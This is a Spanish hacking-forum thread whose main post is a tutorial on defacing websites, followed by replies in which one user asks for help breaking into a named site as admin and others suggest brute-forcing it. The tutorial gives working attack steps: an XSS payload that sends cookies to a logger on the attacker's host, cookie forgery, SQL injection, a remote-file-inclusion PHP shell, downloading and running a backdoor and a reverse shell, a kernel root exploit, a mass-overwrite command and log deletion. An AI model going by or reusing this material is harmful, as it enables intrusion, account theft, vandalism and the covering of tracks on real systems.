DeFaCiNg >> HaCkInG-FoRuM

HaCkInG-FoRuM

foro sobre cualquier tema relacionado con el hacking

HaCkInG-FoRuM
DeFaCiNg

* E-mail:
* Password:

¿Has olvidado tu Password?

Lista de mensajes

Autor

Mensaje

123

Mensajes: 1

Registrado: Octubre/2007

Estado: Off-line

Grupo: Nuevo usuario

hola

16/Octubre/2007 - 13:03

Muy muy buen manual, te felicito

geron

Mensajes: 1

Registrado: Mayo/2007

Estado: Off-line

Grupo: Nuevo usuario

Re: Re: Re: Sobre Defacing

13/Mayo/2007 - 19:28

yo solia usar en mis tiempos el obiwan , del proyecto 2068 es bastante efectivo si tienes buenos passlists

hollow-man

Mensajes: 1

Registrado: Mayo/2007

Estado: Off-line

Grupo: Nuevo usuario

Re: Re: Re: Sobre Defacing

13/Mayo/2007 - 18:56

mmmmm nose, pero a veces lo sencillo suele ser lo mejor.. bueno....que programas tienes??? yo suelo usar el brutus..o un john bien conectado al servidor por ftp o directamente

SnZ

Mensajes: 2

Registrado: Mayo/2007

Estado: Off-line

Grupo: Nuevo usuario

Re: Re: Sobre Defacing

13/Mayo/2007 - 12:38

Brute force? ... puerto 80? dudo mucho pero por probar...

¿que programa utilizo para este caso?

Hollow_man

Mensajes: 1

Registrado: Mayo/2007

Estado: Off-line

Grupo: Nuevo usuario

Re: Sobre Defacing

13/Mayo/2007 - 00:22

a simple vista podrias probar con un programa por fuerza bruta a entrar en la cuenta de admin, ya que tiene un puerto abierto..podrias conectar el programa de fuerza bruta con su servidor

SnZ

Mensajes: 2

Registrado: Mayo/2007

Estado: Off-line

Grupo: Nuevo usuario

Sobre Defacing

11/Mayo/2007 - 18:15

Hola, tengo una duda. He leido el tutorial defacing y no me cuadra ciertas cosas respecto a mi web victima. www.psphunters.com . Lo que me interesa es entrar como admin para hacer algunos cambios. Con el SSS le e exo un scan completo, la ultima version y salen 2 bugs. pero no se aprovecharlos. Primero este:

The list of Script:

CODIGO:

Web Servers : The list of scripts
Port 80
Description Found scripts on web site
Risk level Information
Scripts http://www.psphunters.com/rss/?f=1
http://www.psphunters.com/profile.forum?mode=register
http://www.psphunters.com/login.forum?connexion
http://www.psphunters.com/portal.forum?article=75&pid=1
http://www.psphunters.com/posting.forum?mode=reply&t=75
http://www.psphunters.com/calendar.forum?start=20070401&fid=
http://www.psphunters.com/search.forum?search_id=unanswered
http://www.psphunters.com/groupcp.forum?g=10
http://www.psphunters.com/msg.forum?mode=post&u=1
http://www.psphunters.com/Salon-Otaku-c13/Otaku-f105/feria-del-manga-en-parla-t655.htm?highlight=
http://www.psphunters.com/Videojuegos-c10/Final-Fantasy-f74/General-f75/TRIPLE-TRIAD-en-PsP-homebrew-t653.htm?highlight=
http://www.psphunters.com/Zona-de-videos-c15/Videos-de-Risa-f118/Droja-en-el-cola-cao-t646.htm?highlight=
http://www.psphunters.com/Videoconsolas-c9/PSP-f49/Noticias-f54/Killzone-online-pronto-t643.htm?highlight=
http://www.psphunters.com/Videoconsolas-c9/PS3-f51/Noticias-f62/ya-esta-listo-el-nuevo-eye-toy-de-ps3-t635.htm?highlight=
http://www.psphunters.com/Videoconsolas-c9/PSP-f49/Videojuegos-f55/el-budokai-2-se-retrasa-t632.htm?highlight=
http://www.psphunters.com/Videoconsolas-c9/PS3-f51/Noticias-f62/nueva-actualizacion-del-network-t631.htm?highlight=
http://www.psphunters.com/Trucoteca-c11/PS3-f100/tony-hawks-8-t591.htm?highlight=
http://www.psphunters.com/Trucoteca-c11/PS3-f100/Resistance-fall-of-man-t590.htm?highlight=
http://www.psphunters.com/Trucoteca-c11/PS3-f100/Marvel-Ultimate-Alliance-t589.htm?highlight=
http://www.psphunters.com/Trucoteca-c11/Pc-Xbox-360-y-Wii-f101/trucos-zelda-twilight-princess-para-WII-t587.htm?highlight=
http://www.psphunters.com/Trucoteca-c11/PS2-f99/Arc-el-crepusculo-de-las-almas-t586.htm?highlight=
http://www.psphunters.com/Videojuegos-c10/Silent-Hill-f145/General-f155/Cuando-sale-el-SILENT-HILL-ORIGINS-t575.htm?highlight=
http://www.psphunters.com/Partidas-de-Rol-c17/General-f158/Normas-obligatorio-leerlas-para-jugar-t572.htm?highlight=
http://www.psphunters.com/Videojuegos-c10/Tekken-f85/General-f86/Que-rango-teneis-en-tekken-t554.htm?highlight=
http://www.psphunters.com/Eternal-Hunters-c3/Historias-del-Kokoto-f12/ZERAKY-t553.htm?highlight=
http://www.psphunters.com/Videoconsolas-c9/Xbox-360-f64/General-f65/buscando-gente-t541.htm?highlight=
http://www.psphunters.com/Videojuegos-c10/Dark-chronicles-f144/General-f153/Nueva-seccion-t522.htm?highlight=
http://www.psphunters.com/Videojuegos-c10/Final-Fantasy-f74/Fotos-y-Videos-f77/Todos-los-spers-de-final-12-t520.htm?highlight=
http://www.psphunters.com/General-c2/Compra-y-venta-f139/Compra-f141/Busco-t474.htm?highlight=
http://www.psphunters.com/General-c2/Album-f146/Album-general-f148/Funcionamiento-de-la-seccion-t461.htm?highlight=
http://www.psphunters.com/Musica-c16/Video-Clips-f122/Hipopotamo-cantor-t457.htm?highlight=
http://www.psphunters.com/Musica-c16/Video-Clips-f122/TOMA-TEMAZO-t450.htm?highlight=
http://www.psphunters.com/Musica-c16/General-f121/Radio-Melk-Cowboy-Bebop-t444.htm?highlight=
http://www.psphunters.com/Foro-c1/Tutoriales-y-problemas-de-registro-f10/Como-ponerme-la-firma-t443.htm?highlight=
CVE GENERIC-MAP-NOMATCH

y este:

CODIGO:

Web Servers : The list of E-Mail
Port 80
Description Found E-Mail on web site
Risk level Information
E-Mail //pacojkmaul@hotmail.com/
CVE GENERIC-MAP-NOMATCH

Si me podeis ayudar, lo agradeceria mucho.

arsk

Mensajes: 17

Registrado: Abril/2007

Estado: Off-line

Grupo: Administrador del foro

DeFaCiNg

30/Abril/2007 - 11:57

####################################################

TUTORIAL: TECNICAS MAS USADAS EN EL DEFACING

####################################################

� Que es el Defacing ?

El Defacing consiste en aprovechar uno o varios bugs (errores) en una web o servidor web, con el fin de alterar uno o varios archivos de este mismo.

Ejemplo de un Deface:

Mirror

� Es ??tico ?

La verdad es que no, amenos que el admin se lo halla buscado, te roba a tu novia, le pego a tu mam�, te hallan retado, que se yo, no se tiene porque hacer un deface

..

*Las t�cnicas que voy a explicar:

- XSS (Cross Site Scripting) y envenenando la cookie
- HTML Injection 1 y 2
- SQL Injection
- RFI (Remote File Inclusion)
- Colocando un Backdoor
- Obteniendo root y haciendo un mass defacement
- Algunas otras cosas

Comencemos..

----------------------------------------------------------------

-XSS (Cross Site Scripting) y envenenamiento de cookies

----------------------------------------------------------------

Bien, esta t�cnica se basa en el mal filtrado de c�digo malicioso (html, javascript) por el servidor Web (javascript se ejecuta en el browser y no en el servidor) , la mayor�a de la gente piensa que esta t�cnica no sirve que solo sirve para sacar ventanitas de alerta, FALSO !

Un ejemplo:

Entramos a alguna Web donde muestran las nuevas vulnerabilidades y vemos que dice algo sobre un nuevo bug XSS en los foros phpBB (bug muy com�n en estas aplicaciones)

el bug se explota as�:

C�DIGO
[url]www.[url=www.s=''style='top:expression(eval(this.sss));'sss=`window.location.href='http://www.web.com';this.sss=null`s='][/url][/url]'

Si lo �nico que queres hacer es molestarlo podr�amos redireccionarlo a una Web porno o a tu sitio Web

Pero si se quiere intentar hacer un deface, podr�amos intentar robar la cookie del admin

Para esto necesitamos algunas cosas:

-un webhosting
-tener buena ingenier�a social
-que el foro sea vulnerable
-que el browser del admin sea vulnerable

Comencemos, primero

Creamos un archivo de texto con este c�digo:

C�DIGO
<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, "$cookie \n");
fclose($fff);
?>

Lo guardamos como cookies.php y lo subimos a un servidor gratuito A hora hay que construir el c�digo que se va a encargar de robar la cookie

C�DIGO
window.location='http://www.tuhosting.com/cookies.php?cookie='+document.cookie;

Y aplicamos esto en el bug de los phpBB:

C�DIGO
[url]www.[url=www.s=''style='top:expression(eval(this.sss));'sss=`http://www.tuhosting.com/cookies.php?cookie='+document.cookie;';this.sss=null`s='][/url][/url]'

Esto es lo que hay que hacer que el admin visualice

Con esto va a ser redireccionado al archivo encargado de robar la cookie =)

Claro que esto va a ser muy evidente y si el admin tiene algo de conocimentos cambiara su pass casi inmediatamente, para esto se puede aplicar un iframe de borde 0 y posiblemente nunca sabr�a que paso xD

A esta todo a si que le mande el c�digo en un mp.

Ahora solo falta esperar...

Unas horas despu�s entre al ftp donde hab�a hospedado el archivo cookies.php y para mi suerte ahora exist�a un archivo con el nombre archivo.txt

siii, ese archivito es la cookie del admin =)

Lo descargue me puse a revisarlo y era algo como esto:

C�DIGO
s:11:"autologinid"/s:32:"d9ee0d1e7dd4e8993f097d1c3d6a3e54"/s:6:"userid"/s:1:"1"

Ah� esta la cookie del admin ahora hay que tomar los datos importantes..

d9ee0d1e7dd4e8993f097d1c3d6a3e54 = Hash del admin

userid"/s:1:"1" = el 1 es la id del usuario en este caso el admin

Como crackear no es muy efectivo y puede demorar bastante he pensado en la falsificaci�n de la cookie, osea modificar la cookie de invitado
para hacer creer que es el admin.

Una forma de hacerlo, editando la cookie de la carpeta C:\Documents and Settings\usuario\cookies\ (la ubicacion puede variar)

Y ah� buscamos la cookie del foro ejemplo:

usuario@foros.zonavirus

Abr� el txt y vi algo como esto:

C�DIGO
foroszonavirus_data%0Aa%3A2%3A%7Bs%3A11%3A%22autologinid
%22%3Bs%3A32%3A%2213ac97aada67bc8514a2bccf76763063%22%3Bs%3A6%3A%22userid
%22%3Bs%3A3%3A%22500%22%3B%7D%0Aforos.zonavirus.com
%2F%0A1536%0A1893476224%0A29820006%0A61865024%0A29746581%0A*%0A

La cookie esta encriptada, a si que hay que buscarse un urldecode hay muchos en la red.

Una ves que lo encontramos hay que decodificarla y ahora sale algo como esto:

C�DIGO
foroszonavirus_data
a:2:{s:11:"autologinid";s:32:"13ac97aada67bc8514a2bccf76763063";s:6:"userid";s:3:"500";}
foros.zonavirus.com/
1536
1893476224
29820006
61865024
29746581
*

Ahora hay que cambiar los datos por los que recogimos de la cookie del admin cambiamos el hash por el del admin y donde dice user id cambiamos el 500 por un 1

Ojo donde dice s:3: cambiamos el 3 por un 1 ese numero varia dependiendo el numero de caracteres que tenga la id del usuario.

Ahora que ya modificamos volemos a encriptar la cookie por el m�todo de urlencode:

C�DIGO
foroszonavirus_data%0Aa%3A2%3A%7Bs%3A11%3A%22autologinid
%22%3Bs%3A32%3A%22d9ee0d1e7dd4e8993f097d1c3d6a3e54%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%221%22%3B%7D%0A
foros.zonavirus.com%2F%0A1536%0A1893476224%0A29820006%0A61865024%0A29746581%0A*%0A

Borramos el contenido anterior del txt usuario@foros.zonavirus y ponemos el c�digo de la cookie falsificada y le damos en guardar.

Ahora abrimos el navegador y entramos al foro y....

ohhhh estoy logeado como el admin!!!!

Esa es la forma m�s dif�cil

Hay otra forma que seria logearnos en el foro con nuestro user y password con la opci�n recordar contrase�a activada

Y descargamos el software, Internet Explorer Cookies Viewer (IECV) o con la yuda de alguna extension para FF que permita editar cookies

Lo ejecutamos y aparecen todas las cookies buscamos la del foro y hacemos las modificaciones necesarias guardamos los cambios y nos posicionamos sobre el nombre de la cookie, un click derecho y le damos en "abrir website"

Si lo hicieron bien deber�an estar logeados como el admin.

Otra forma seria editando las cabeceras con el achilles , en el momento en que nuestro browser manda la informaci�n de nuestro md5 e id, cambiarlos por los del admin y deber�a loguearlos como el admin =)

Ya que al parecer el foro era una versi�n antigua pude entrar al panel de administrador (en las versiones mas nuevas, pide una autentificaci�n al momento de entrar al panel de admin)

------------------------

-HTML Injection 1

------------------------

Esta es un t�cnica muy newbie consiste en inyectar c�digo html en la Web esto se puede hacer mediante tagboards, libros de visitas, etc

Para poder llevar acabo esta t�cnica la aplicaci�n tiene que tener activado el html

Para saberlo pueden intentar postear esto:

C�DIGO
<h1>Hola</h1>

Si ven que la palabra hola aparece mas grande de lo normal es que tenemos html activado =)

Y pueden poner un c�digo de redirecci�n a cualquier Web

C�DIGO
<script>window.location='http://www.tupagina.com';</script>

xD

Eso es todo

--------------------------

-HTML Injection 2

--------------------------

Supongamos que en un libro de visitas posteamos <h1>hola</h1> vemos el comentario y nos damos cuenta que no paso nada =( Cualquiera dir�a, este sitio no es vulnerable. Cosa que puede que no sea cierta.

En algunos hay que moldear el c�digo =D

Para comprobarlo ponemos esto <> en todos los campos que nos sean permitidos (nombre, email, url, comentario), vemos el c�digo fuente y nos damos cuenta que no est�n permitidos, excepto en el campo de url =)

El c�digo fuente esta algo a si:

C�DIGO
<table border="0" width="94%" cellspacing="1">
<tr>
    <td width="20%"><font face="Arial" color="black"><strong>Nombre:</strong></font></td>
    <td width="80%"><font color="black"></font></td>
</tr>
<tr>
    <td width="20%"><font face="Arial" color="black"><strong>E-Mail:</strong></font></td>

    <td width="80%"><font color="black">@</font></td>
</tr>
<tr>
    <td width="20%"><font face="Arial" color="black"><strong>Localidad:</strong></font></td>
    <td width="80%"><font color="black"></font></td>
</tr>
<tr>
    <td width="20%"><font face="Arial" color="black"><strong>Homepage:</strong></font></td>

    <td width="80%"><font color="black"><a href="http://<>"> </a></font></td>
</tr>
<tr>
    <td width="20%"><font face="Arial" color="black"><strong>Me encontr� en:</strong></font></td>
    <td width="80%"><font color="black">en GaliciaCity</font></td>
</tr>
<tr>

    <td width="20%"><font face="Arial" color="black"><strong>Me punt�a con:</strong></font></td>
    <td width="80%"><font color="black">10</font></td>
</tr>
<tr>
    <td width="20%" valign="top"><font face="Arial" color="black"><strong>Comentarios:</strong></font></td>
    <td width="80%"><font color="black"></font></td>
</tr>

Vemos que para hacer la inyecci�n tenemos que cerrar las etiquetas </a></font></td>

Para eso ponemos algo a si:

C�DIGO
www.google.com"> </a></font></td><h1>HOLA</h1>

Y Sorpresa!! HOLA aparece enorme, la inyecci�n funciono =D

Vemos el c�digo fuente y vemos como fue modificado:

C�DIGO
<tr>

    <td width="20%"><font face="Arial" color="black"><strong>Homepage:</strong></font></td>
    <td width="80%"><font color="black"><a href="http://www.google.com"> </a></font></td><h1>HOLA</h1>"> </a></font></td>
</tr>

=) y eso es todo

--------------------------

-SQL Injection

--------------------------

� Que es SQL Injection ?

Como su nombre lo dice Sql Injection = Inyecci�n SQL, es cuando se inyecta un c�digo sql, dentro de otro con el fin de generar una acci�n no normal, tambi�n sirve para obtener informaci�n, modificar datos, etc.

--

Un ejemplo..

Supongamos que encontramos un buscador vulnerable a SQL Injection, es un buscador de personas donde pones un nombre y el buscador te da la informaci�n de la persona.

el buscador trabaja por una consulta a si:

C�DIGO
SELECT * FROM canada WHERE persona = 'NOMBRE PERSONA';

Entonces si escribimos en el buscador algo a si:

C�DIGO
Lyoko'; DROP TABLE canada'%

La consulta final tendr�a esta forma

C�DIGO
SELECT * FROM canada WHERE persona = 'Lyoko';
DROP TABLE canada'%';

Como resultado, buscar�a a la persona de nombre lyoko y posteriormente borrar�a la tabla "canada".
Lo que hicimos fue inyectar el c�digo malicioso entre el c�digo original.

Pueden buscar m�s comandos aqu�:

COMANDOS SQL

---------------------------------------

-RFI (Remote File Inclusion)

---------------------------------------

CITA
RFI (Remote File Inclusion), traducido al espa�ol como Inclusi�n Remota de Archivos - vulnerabilidad existente solamente en p�ginas din�micas en PHP que permite el enlace de archivos remotos situados en otros servidores a causa de una mala programaci�n de la p�gina que contiene la funci�n include().

Este tipo de vulnerabilidad no se da en p�ginas programas en ASP o en cualquier otro tipo de lenguaje similar que no contenga la posibilidad de la inclusi�n remota de archivos ajenos al servidor.

En si lo que hace la vulnerabilidad es que nos permite incluir archivos en el servidor, si incluimos un archivo que permita ejecutar comandos *nix (shell) podr�amos realizar un deface.

..

Primero localizamos a la victima www.victima.com, navegamos en la Web en busca de unas vulnerabilidades.

Vemos algo como esto:

www.victima.com/index?seccion=descargas

Vemos que index.php toma la variable descargas y la incluye, esto es como si estuvi�ramos viendo www.victima.com/descargas.php

Ahora probemos si es vulnerable a RFI..

Primero abrimos block de notas y pegamos este c�digo

C�DIGO
<?

system($cmd)

?>

Lo subimos alg�n servidor como shell.txt <--- tiene que ser una extensi�n diferente a php, para que no se ejecute dentro de tu propio servidor.

Esto nos va a servir como una shell, Ahora probamos:

www.victima.com/index?seccion=http://www.atacante.com/shell.txt?&cmd=[COMANDO]

Como comando podemos probar con cualquier comando *nix

www.victima.com/index?seccion=http://www.atacante.com/shell.txt?&cmd=id

id <-- nos dice quienes somos en el servidor

CITA
uid=99(nobody) gid=99(nobody) groupes=99(nobody)

../shell.txt?&cmd=pwd <-- nos dice en que parte del servidor estamos

CITA
/home/toutacha/www

../shell.txt?&cmd=uname -a <-- Informaci�n sobre el SO, kernel, compilaci�n, etc.

CITA
Linux ns34863.ovh.net 2.4.32grs-bipiv-ipv4 #1 SMP Tue Jan 31 17:34:40 CET 2006 i686 unknown

../shell.txt?&cmd=ls <-- Lista los archivos del directorio

CITA
000000100A.jpg
descargas
forum
00000010.jpg
00000011.jpg
000000120A.jpg
0000001.jpg
0000002.jpg
00000037R.jpg
0000003.jpg
00000041C.jpg
0000004.jpg
0000005.jpg
index.php

Humm no hay nada interesante, me voy a mover al directorio forum

../shell.txt?&cmd=cd /home/toutacha/www/forum/;ls

CITA
add_url.php
admin_edit_banned_ban.php
admin_edit_banned.php
admin_edit_banned_unban.php
admin_edit_category_add.php
admin_edit_category_delete.php
admin_edit_category_move.php
admin_edit_category.php
admin_edit_page_accept.php
admin_edit_page_add.php
admin_edit_page_delete.php
admin_edit_page_move.php
admin_edit_page_pending.php
admin_edit_page.php
admin_edit_pending.php
admin_edit.php
admin.php
admin_search.php
admin_uninstall.php
config.php
cs.php
exit.php
header.php
hp.php
images
include_admin.php
include_banned.php
include_install.php
include.php
include_ppc.php
index.php
lang.php
rachat-credit.html
search.php
stats
style.css
template_add_url.php
template_index.php
template_search.php
test.html

=O Ah� esta el config.php, podemos ver los datos con los que se conecta a la BD

../shell.txt?&cmd=cd /home/toutacha/www/forum/;cat config.php <--- cat muestra el contenido de un archivo

CITA
<?
$mysql_hostname = "localhost";
$mysql_user = "toutacha";
$mysql_password = "987410";
$mysql_database = "toutacha";
$prefix = "dir_";

$show_additional_results = FALSE; // TRUE OR FALSE
$bannerboxes_id = "f48a32ca-72a7-498d-8a49-66e5b2e3093c";
// Get your own id at http://www.bannerboxes.com?affid=f66b05a0-...83-b075e015c6af
// and start earning money with your directory!
?>

Ah� esta el pass xD, podemos probar ese pass en el ftp y como se dan cuenta el usuario toutacha xD, con suerte van a poder entrar =)

Sobrescribiendo un archivo

../shell.txt?&cmd=echo defaced by lyoko > index.php

Para ejecutar mas de un comando a la vez usen el ;

../shell.txt?&cmd=[COMANDO]; [COMANDO]; [COMANDO]..

Y eso es todo =)

Para ver si funciono vemos el index

CITA
defaced by lyoko

Si funciona xD

Pude sobrescribir el archivo porque tenia permisos de escritura sobre este, para saberlo puede correr este comando.

../shell.txt?&cmd=ls -la <-- les va a listar todos los archivos, con sus respectivos permisos =)

Estas son solo unas cosas que se pueden hacer, pueden buscar gu�as sobre comando *nix y experimentar ustedes.

--------------------------------

-Colocando un Backdoor

--------------------------------

CITA
Los Troyanos Backdoor, se han consolidado como la temible nueva generaci�n de vandalismo cibern�tico, debido a su modalidad de incursi�n ilegal en servidores, estaciones de trabajo o PCs, pudiendo tomar el control de los sistemas comprometidos, con los consiguientes da�os que ello implica, nada menos que a trav�s de cualquiera de los 65535 puertos TCP/IP.

Los Troyanos Backdoor no son esencialmente virus, sino "Herramientas de Control Remoto".

Bueno para estar mas c�modos y poder aspirar a mas cosas no basta con una simple php shell.

Supongamos que tenemos una Web vulnerable a RFI o RCE cualquier cosa, lo primero que tenemos que hacer subir el backdoor a un directorio con permisos 777.
lo mejor seria subirlo al directorio tmp ya que siempre tiene permisos 777

shell.txt?&cmd=cd /tmp; wget www.atacante.com/backdoor

CITA
cd /tmp/; wget www.atacante.com/backdoor

--21:33:39-- http://www.atacante.com/backdoor
=> `backdoor'
Resolving www.atacante.com... 64.72.112.133
Connecting to www.atacante.com[64.72.112.133]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 366,196 [application/x-shockwave-flash]

0K .......... .......... .......... .......... .......... 13% 101.60 KB/s
50K .......... .......... .......... .......... .......... 27% 29.04 KB/s
100K .......... .......... .......... .......... .......... 41% 44.92 KB/s
150K .......... .......... .......... .......... .......... 55% 51.46 KB/s
200K .......... .......... .......... .......... .......... 69% 43.22 KB/s
250K .......... .......... .......... .......... .......... 83% 97.48 KB/s
300K .......... .......... .......... .......... .......... 97% 55.43 KB/s
350K ....... 100% 53.56 KB/s

21:33:46 (50.99 KB/s) - `backdoor' saved [366,196/366,196]

Ahora le damos permisos 777

shell.txt?&cmd=chmod 777 backdoor

y por ultimo solo lo ejecutamos

shell.txt?&cmd=./backdoor

CITA
Innocent Boys Backdoor

Binding the 9865
OK, pid = X

Ahora solo nos conectamos a la web por el puerto 9865, pueden usar el putty o el NetCat

Si todo salio bien, tendr�a que aparecerles una shell =)

Pero que pasa si no, el server tiene un firewall =( pero como era de esperarse hay una forma de saltarlos y es por medio de un backdoor de conexi�n inversa =D
�sea el backdoor se conecta a nosotros.

Usemos el backdoor connect back

Hacemos lo mismo que con el otro.

Lo subimos, le damos permisos 777

a la hora de ejecutarlo tenemos que especificar unos par�metros

CITA
./back IP PUERTO

IP es la ip a donde se va a conectar y PUERTO el puerto que tenemos a la escucha

para dejar un puerto a la escucha lo podemos hacer con el netcat

CITA
nc -vv -L -p 2222
donde 2222 puede ser un puerto cualquiera =)

Ahora solo lo ejecutamos y walaaa!

CITA
Connect Back Backdoor [*] Dumping Arguments [*] Resolving Host Name [*] Connecting... [*] Spawning Shell [*] Detached

--------------

A veces con los permisos de nobody, puedes hacer bastante, solo hay que saber los comandos necesarios.
Podes buscar archivos de passwords, configs, directorios con permisos abiertos, o simplemente espiar.

-----------------------------------------------------

-Obteniendo root y haciendo un mass defacement

-----------------------------------------------------

Un mass defacement, corresponde defacera todas las webs de un determinado, servidor, esto se logra obteniendo el nivel de s�per usuario.
No voy a profundizar porque ya ha sido bastante documentado.

Bien con el backdoor corriendo, es imposible no pensar porque no intentar hacer un mass =)

Miremos la versi�n del kernel:

uname -a

CITA
Linux ns34863.ovh.net 2.4.32grs-bipiv-ipv4 #1 SMP Tue Jan 31 17:34:40 CET 2006 i686 unknown

=O 2.4 Hay bastantes exploits que permiten sacar root en estos kernels, uno de ellos es el uselib24

Probemos si funciona.

cd /tmp/; wget www.atacante.com/uselib24

Muy bien ya lo subimos

chmod 777 uselib24

D�ndole permisos 777

./uselib24

Ejecut�ndolo

Ahora solo esperamos...

Ya termino, miremos si funciono

[id]

CITA
uid=0(root) gid=0(root) groups=0(root)

Si funciono!!! =D

Ahora podemos hacer todo lo que nos de la gana, ya no tenemos restricciones.

Pero concentr�monos en el mass.

Busquemos las webs que aloja

cat /etc/httpd/conf/httpd.conf|grep ServerName

cat /etc/localdomains

cat /etc/trueuserdomains

cat /etc/userdomains

Si los encontraron, bien =)

Ahora, hay que remplazar los index.

Suban su index a cualquier directorio, yo lo hice en tmp

Ahora hay que correr este comando

CITA
find / -name "index.*" -exec cp /tmp/lko.txt {} \;

* Esto tarda un rato..

Cuando termine, solo verificamos, entren a cualquiera de las web que hospeda el servidor y deber�an ver su index.

Ahora hay que borrar los logs

cd /; rm .bash_logut; rm .bash_history; unset HISTFILE

find / -name "*.log" -exec rm -rf {} \;

Tambi�n pueden usar un zapper, para hacer todo mas r�pido

Y listo, ya podemos morir en paz =)

-----------------------------------

-Algunas otras cosas

-----------------------------------

Algunos se pueden preguntar y para que ostias me sirven los exploit? La mayoria de los exploits que van a encontrar en los bugtracks para defacear webs
son solo herramientas que aprovechan bugs ya conocidos (RFI, RCE,), solo que lo hacen automaticamente. en si lo que hacen es que facilitan el trabajo. =)

..

..

Tambien puede pasar que no encuentren ningun bug en la web, �Esta todo perdido?

No, si no encuentran un bug en la web pueden buscar del lado del servidor, para esto se necesitan mas herramientas, algunos scanners, etc.

Solo para hacerlo rapido.

Quiero defacear la web de fulanito

www.fulanito.com

Entre y no encontre nada que comprometa la seguridad. Entonces busco vulnerabilidades en el servidor.

primero saco la IP

CITA
ping www.fulanito.com

CITA
Haciendo ping a www.fulanito.com [168.243.176.130] con 32 bytes de datos:

Respuesta desde 168.243.176.130: bytes=32 tiempo=35ms TTL=56

Respuesta desde 168.243.176.130: bytes=32 tiempo=33ms TTL=56

Respuesta desde 168.243.176.130: bytes=32 tiempo=38ms TTL=56

Respuesta desde 168.243.176.130: bytes=32 tiempo=41ms TTL=56

Estad�sticas de ping para 168.243.176.134:

Paquetes: enviados = 4, recibidos = 4, perdidos = 0

(0% perdidos),

Tiempos aproximados de ida y vuelta en milisegundos:

M�nimo = 33ms, M ximo = 41ms, Media = 36ms

Vemos que la IP es 168.243.176.130

Ahora voy a hacer un peque�o scan con el nmap.

CITA
nmap 168.243.176.130 -O -sV

para que me liste los puertos, SO, y daemons =)

para guardarlo en un archivo de texto:

CITA
nmap 168.243.176.130 -O -sV > info.txt

Vemos los daemons, hay que investigar si existe algun bug conocido para alguno de esos daemons

www.securityfocus.com
www.milw0rm.com

Tambien vimos que puertos estan abiertos, podriamos probar un bruteforce en el 22 xD

Si encontraron algun exploit, solo compilenlo y corranlo y si el exploit no tiene errores y el servidor no esta parchado lo mas seguro es que les funcione y dependiendo de lo que trate el bug a si sera el resultado
puede que haga un bypass, un DoS, un RCE, o hasta un BoF que les brinde Remote Root.

*La mayoria de los exploits tienen errores de programacion para evitar scriptskiddys.

Tambien puede pasar, no encontraron bugs en el servidor o no pudieron explotarlos, la web objetivo no parece defaceable.

Todavia les queda una forma y es scannear el server y listar las webs que aloja. =)

Pueden probar con tools para hacer whois, nslookup, etc, o simplemente netcraft =)

Cuando ya tengan la lista, solo queda ir probando 1 por 1 en busca de algun bug si lo encontraron, intente conseguir una shell, haganse root y con esos permisos defaceen la web objetivo.

Y eso estodo lo que tengo que decir.

Suerte!

-------------------

Recuerden que esto solo es un vistazo a cada tecnica, todas las tecnicas son mucho mas profundas, pero espero que con esto les quede una idea, y tampoco estoy diciendo que estas son las unicas tecnicas que existen =)

Y acuerdense que el defacing ya no es bien visto xD

Cualquier ampliaci�n o corecci�n es bien recibida.

--------
Redacted by Lyoko

Usuarios activos

1 usuarios activos: 0 miembros y 1 huespedes en el foro.

Reglas de mensaje

Tú puedes escribir nuevos temas
Tú puedes responder a los temas
Tú puedes adjuntar archivos
Tú no puedes editar tus mensajes

Contactar con el Administrador del foro.

La utilización del servicio vendrá condicionada por la previa aceptación de las Condiciones Generales de Uso del Servicio.

Foro gratis creado en ForosWebGratis.com. Crea tu propio foro aquí.